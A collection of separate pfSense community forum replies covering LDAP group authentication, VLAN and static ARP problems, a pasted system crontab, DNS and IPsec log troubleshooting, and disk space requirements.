stephenw10 - I was just saying the same thing about SSL and STARTTLS then realized you had already clarified that! In that example I gave above about the "test1" and test2" groups they were sitting side by side in the root domain which is why I don't at all understand why one works and one doesn't when my authentication container is the root domain itself. If it see's one OU it should see both right? Unless there's a way to make pfSense do a more detailed query when someone tries to log in I've about decided that this won't work. One thing I have not tried yet because it seems kind of messy to deal with later on down the road is listing each individual OU in the authentication container field. This would be easy to do since it lets you select OU's with checkboxes but if for some reason I ran into a scenario where pfSense couldn't talk to AD and I couldn't pull up that list of checkboxes it would be hell to sift through all that data in that tiny field if an OU got deleted or something screwing the whole thing up. Hopefully that makes sense.... Thanks for the responses everyone!

Per Netgate Support, downgrading to 2.4.3_p1 until fixed.

@marvosa said in Problem with Static ARP entry for VLAN/Virtual Interface: @joelones said in Problem with Static ARP entry for VLAN/Virtual Interface: the switch port of my Mac OSX is trunked to VLAN10 Please clarify... cause none of this sounds right What I meant to say, was the the port of the netgear switch on which my Mac OS X box is connected allows untagged as well as VLAN 10 traffic to pass. But I suspect the Mac OS X update did something to affect this behaviour as it was working fine before the update and pfSense saw the VM's MAC address now it does not.

/etc/crontab - root's crontab for FreeBSD $FreeBSD$ SHELL=/bin/sh PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin #minute hour mday month wday who command #*/5 * * * * root /usr/libexec/atrun Save some entropy so that /dev/random can re-seed on boot. #*/11 * * * * operator /usr/libexec/save-entropy Rotate log files every hour, if necessary. #0 * * * * root newsyslog Perform daily/weekly/monthly maintenance. #1 3 * * * root periodic daily #15 4 * * 6 root periodic weekly #30 5 1 * * root periodic monthly Adjust the time zone if the CMOS clock keeps local time, as opposed to UTC time. See adjkerntz(8) for details. #1,31 0-5 * * * root adjkerntz -a pfSense specific crontab entries Created: July 24, 2018, 8:39 pm 1,31 0-5 * * * root /usr/bin/nice -n20 adjkerntz -a 1 3 1 * * root /usr/bin/nice -n20 /etc/rc.update_bogons.sh */60 * * * * root /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 sshlockout */60 * * * * root /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 webConfiguratorlockout 1 1 * * * root /usr/bin/nice -n20 /etc/rc.dyndns.update */60 * * * * root /usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 virusprot 30 12 * * * root /usr/bin/nice -n20 /etc/rc.update_urltables 1 0 * * * root /usr/bin/nice -n20 /etc/rc.update_pkg_metadata */5 * * * * root /usr/local/bin/vnstat -u 1 0 * * * root /bin/pkill -HUP -F /var/run/bandwidthd.pid If possible do not add items to this file manually. If done so, this file must be terminated with a blank line (e.g. new line) Hope it helps you!

Ah, so that's an older version of the development package for ACB2. That is now merged into the base in 2.4.4 so I don't think it's available as a package. At least 2.11 was though so it's likely that bug is fixed. At this point I would either remove it and go back to the v1 ACB package or go to 2.4.4 snapshot if you're able to. The usual warnings apply though, don't run it in production etc... Steve

Still waiting for : ipconfig /all Consider : @bisssane said in pfsense work and after few days , it doesn't work: for the DNS, it is not activated on Pfsense, I use the DNS server of the company This can work, but is probably not setup correctly. So, is this "DNS company server" on the same LAN as other devices ? Do devices on LAN(s) obtain the correct IP address from pfSense as "the DNS server" ? (the ipconfig /all test) If the DNS server is on a separate LAN, firewall rules permit traffic to reach the DNS server ? Etc etc etc. Detail your setup, and you'll have an answer right away. ( Btw : know that pfSense can handle DNS just fine and all that with zero config needed ^^)

It is the total number of entries allowed in firewall tables. This includes aliases as well as lists of hosts from features like URL table aliases, bogons, packages that make lists like pfBlocker, and anything else hooked into the aliases/tables function of pf.

You probably need to use the root user there. Steve

Yes, related to the(reverse NAT?) issue with upgrading the standby; the first attempt at upgrading did not complete before timing out. I believe I got a "upgrade already in progress" when I ran a subsequent upgrade from shell and then wound up rebooting...

You can setup pfSense bridged so it doesn't route anything. https://www.netgate.com/docs/pfsense/interfaces/interface-bridges.html If you don't use pfSense to route the traffic, and the USG is NATing, then you won't have any internal visibility from Snort. No way to see which internal IP is sending bad traffic if you get malware for example. Steve

You can use Squid with Lightsquid to get a list of sites like that per internal IP. Steve

Have you tried the commands in the "Update Troubleshooting" section of the release blog post(s)? https://www.netgate.com/blog/pfsense-2-4-3-release-p1-and-2-3-5-release-p2-now-available.html

Okay thank you

@johnpoz said in One Update Time Per Day: Cron package allows you to be very specific about when jobs run.. Okay, thank you, Johnpoz, I'll try that package.

Thank you for the replies. I was actually checking from my LAN. When I tried from outside, Firefox timed out; it wasn't able to connect.

Well, you might be closer to a solution as you think. These Draytek router have Radius support, so, setup a centralized database - the one that among other captures the MAC - and your have what you want. If the Draytel will consult this data base before login (on another portal device), that I don't know.

@harvy66 said in Disk Usage/ 100%: I didn't know you could install pfSense on less than 1GiB of storage. Missed that...per https://www.pfsense.org/products/ the requirement is a 1 GB drive, and "Note the minimum requirements are not suitable for all environments." I just looked at an SG-3100 that is not running any packages and it is using 13% of 7 GiB, or per quick math, is using 910 MiB. So yeah 908 MiB is probably too small considering there should be space for updates and logs.

@jknott said in New User... Slow Upload Speed: @harvy66 said in New User... Slow Upload Speed: My cats don't chew on braided cables Are they named CAT 5, CAT 6 etc.? :-) Coincidentally, we're one shy of our 7th cat... Even the braided cables will no longer be safe. Colored split-loom it is. They don't chew on split-loom, but I hate how it looks.

You can define the length of the beep, you can try to find a length that fits your needs!

The best thing to do is log to a remote log server. If adjusting the number of log entries visible using the filter in that view is insufficient, you can use this command to save all IPsec logs: clog /var/log/ipsec.log > /tmp/ipsec.log.txt Execute that in Diagnostics > System Command Then, on that same page, Download File /tmp/ipsec.log.txt The logs kept on the firewall are circular, however, meaning old entries are overwritten by newer entries. The amount of logging kept is set in Status > System Logs, Settings, Log file size (Bytes). What you can do there depends on your disk size. I have mine set to 50000000 (50MB) on a system with a 30GB mSATA and it is still 90% free (about 3GB used Disk space currently used by log files is: 1.2G Remaining disk space for log files: 22G). You have to reset all logs further down on that page for this to take effect. You can save a lot of the system state in a status output file. That is taken by navigating to https://firewall.address/status.php and downoading the resulting file. On busy firewalls that might take a moment to run. And for IPsec issues the logs saved there are often insufficient so the status output should be coupled with an ipsec.log.txt file as described above. If you have more than one tunnel it is often beneficial to get the conXXXX number of the tunnel from ipsec statusall so you can filter on it (and filter out other tunnel logs) using grep, etc.